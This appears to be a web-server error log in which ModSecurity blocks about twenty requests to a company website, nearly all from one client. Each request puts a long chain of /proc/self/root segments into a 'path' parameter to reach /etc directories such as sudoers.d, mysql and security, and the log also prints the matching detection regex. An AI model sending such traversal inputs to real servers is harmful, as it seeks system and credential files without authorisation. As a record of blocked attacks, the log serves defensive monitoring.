[Fri Mar 20 03:38:40.822809 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.243.128:54732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrcPqxLDW4GITHUkSwdwAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:42.077355 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.243.128:54738] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrchCii7xarUs8iHYyuQAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:44.408490 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.243.128:54740] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrdPqxLDW4GITHUkSwegAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:45.750406 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.243.128:54754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrdTJ3M9BSuKP7CAbeeQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:47.055198 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.243.128:54762] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrdzJ3M9BSuKP7CAbefgAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:48.361064 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.243.128:54770] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzreDJ3M9BSuKP7CAbeggAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:49.712198 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.243.128:39616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrefXLqtnMIWvjpaJnzwAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:52.118859 2026] [:error] [pid 10189:tid 140411632822016] [client 74.7.243.128:39622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrfDJ3M9BSuKP7CAbeiwAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:54.483825 2026] [:error] [pid 11642:tid 140411716749056] [client 74.7.243.128:39634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrfrninkcc-iUj5AosZQAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:55.831674 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:39644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrfzJ3M9BSuKP7CAbelgAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:39:02.003303 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.243.128:39646] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrhhCii7xarUs8iHYyyAAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:39:05.504153 2026] [:error] [pid 11642:tid 140411641214720] [client 74.7.243.128:51958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzribninkcc-iUj5AosdgAAA4w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:39:13.843667 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:51968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrkeoXxyEfFpUF8f9SpQAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:39:29.724065 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.243.128:43946] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzroV1pVZ5mVmJwsFMAYwAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:40:30.034774 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.243.128:39688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzr3gF0L0L-SsrnPo43AQAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:40:32.428972 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:45296] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzr4AF0L0L-SsrnPo43BAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:40:41.218755 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.243.128:45302] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzr6V1pVZ5mVmJwsFMAqAAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:40:43.826634 2026] [:error] [pid 11167:tid 140411741927168] [client 74.7.243.128:51190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzr6_HIg5MgXLBnicPKtQAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:40:45.165094 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:51196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzr7eoXxyEfFpUF8f9SzwAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:40:51.363777 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.243.128:51208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzr8_qxLDW4GITHUkSwxQAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:40:52.635001 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.243.128:40606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzr9F1pVZ5mVmJwsFMArgAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:40:56.810978 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.241.31:46030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzr-Lninkcc-iUj5Aos2AAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
